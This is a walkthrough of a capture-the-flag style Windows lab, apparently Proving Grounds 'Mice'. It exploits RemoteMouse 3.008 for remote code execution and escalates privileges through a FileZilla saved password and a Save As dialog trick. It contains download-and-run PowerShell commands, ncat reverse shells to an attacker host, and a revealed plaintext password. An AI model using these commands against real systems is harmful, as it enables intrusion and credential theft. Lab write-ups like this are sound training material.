PG Practice: Windows - Mice

Machine Info

Spoiler

This lab demonstrates exploiting RemoteMouse 3.008 to achieve remote code execution via a modified exploit that delivers a reverse shell. Learners will escalate privileges by extracting and decoding credentials from FileZilla’s configuration files, gaining RDP access as a user. Finally, they will exploit the RemoteMouse application’s admin privileges to spawn a Command Prompt as Administrator. This lab emphasizes RCE, credential exploitation, and leveraging application misconfigurations for privilege escalation.

User

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
ports=$(nmap -p- --min-rate=1000 -T4 $VICTIM | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

└─$ nmap -p$ports -sC -sV $VICTIM
Running second nmap scan with open ports: 1978,1979,1980,3389
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-05 21:27 CET
Nmap scan report for $VICTIM
Host is up (0.033s latency).

PORT     STATE SERVICE        VERSION
1978/tcp open  remotemouse    Emote Remote Mouse
1979/tcp open  unisql-java?
1980/tcp open  pearldoc-xact?
3389/tcp open  ms-wbt-server  Microsoft Terminal Services
|_ssl-date: 2026-03-05T20:30:53+00:00; +14s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2025-12-02T17:03:21
|_Not valid after:  2026-06-03T17:03:21
| rdp-ntlm-info: 
|   Target_Name: REMOTE-PC
|   NetBIOS_Domain_Name: REMOTE-PC
|   NetBIOS_Computer_Name: REMOTE-PC
|   DNS_Domain_Name: Remote-PC
|   DNS_Computer_Name: Remote-PC
|   Product_Version: 10.0.19041
|_  System_Time: 2026-03-05T20:30:25+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|2019 (92%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Microsoft Windows 10 1903 - 21H1 (92%), Microsoft Windows 10 1909 - 2004 (85%), Windows Server 2019 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

RemoteMouse-3.008

Looking at the open ports immediately we spot 1978/tcp open remotemouse - Emote Remote Mouse and upon looking up online we find an RCE vulnerability and a local privilege escalation when you have GUI access that is listed as CVE-2021-35448.

We are going to use the RCE PoC from the above link and try to see if it vulnerable.

Running the command that is listed in the usage of the repo we actually get a hit on our python web server.

1
./RemoteMouse-3.008-Exploit.py --target-ip $VICTIM --cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://$ATTACKER/revshell.ps1')\""

1
2
3
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$VICTIM - - [06/Mar/2026 09:47:27] "GET /revshell.ps1 HTTP/1.1" 200 -

The problem here was that we tried many ports and many different ways to establish a reverse shell. It seems that only ports 80 and 443 seems to be allowed to establish a connection and even then popular payloads and tools didn’t work such as powershell reverse shells. We tried multiple ones without luck.

So we then tried ncat.exe which did the trick. We have to send the executable on the server on a location it exists and then run it. As you will see from the below sample we tried many options.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
└─$ cd ../RemoteMouse-3.008-Exploit 
                                                                                             
└─$ ls
README.md  RemoteMouse-3.008-Exploit.py  setup
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "iwr -uri http://$ATTACKER/ncat.exe -outfile C:\TEMP\ncat.exe' #failed
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "iwr -uri http://$ATTACKER/ncat.exe -outfile C:\Windows\TEMP\ncat.exe'
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "C:\Windows\TEMP\ncat.exe $ATTACKER 4444 -e powershell' #failed
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "C:\Windows\TEMP\ncat.exe $ATTACKER 4444 -e cmd'      #failed
                                                                                             
└─$ python RemoteMouse-3.008-Exploit.py  -t $VICTIM -c 'powershell -c "C:\Windows\TEMP\ncat.exe $ATTACKER 80 -e cmd'  
                                                                 

1
2
3
4
5
6
7
└─$ rlwrap nc -lnvp 80  
listening on [any] 80 ...
connect to [$ATTACKER] from (UNKNOWN) [$VICTIM] 50202
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\Users\divine>

At last we got a shell and we can get the local.txt.

Root

FileZilla

Immediately looking at the user’s directory we spot FileZilla and if we look under the Appdata directory we will find the recent connection with the credentials in base64.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
PS C:\Users\divine\Appdata\Roaming> cd Filezilla
cd Filezilla
PS C:\Users\divine\Appdata\Roaming\Filezilla> cat recentservers.xml
cat recentservers.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
        <RecentServers>
                <Server>
                        <Host>ftp.pg</Host>
                        <Port>21</Port>
                        <Protocol>0</Protocol>
                        <Type>0</Type>
                        <User>divine</User>
                        <Pass encoding="base64">[BASE65PASSHERE]=</Pass>
                        <Logontype>1</Logontype>
                        <PasvMode>MODE_DEFAULT</PasvMode>
                        <EncodingType>Auto</EncodingType>
                        <BypassProxy>0</BypassProxy>
                </Server>
        </RecentServers>
</FileZilla3>
PS C:\Users\divine\Appdata\Roaming\Filezilla> 

User's password

ControlFreak11

Now we can RDP to the machine which gives us more flexibility and options.

As we said earlier we had found a local privilege escalation for the Remote Mouse and now that we have a GUI we can try it.

The steps to reproduce are:

Open Remote Mouse from the system tray
Go to “Settings”
Click “Change…” in “Image Transfer Folder” section
“Save As” prompt will appear
Enter “C:\Windows\System32\cmd.exe” in the address bar
A new command prompt is spawned with Administrator privileges

That’s how we achieve SYSTEM access.

Machine Info#

User#

Reconnaissance#

RemoteMouse-3.008#

Root#

FileZilla#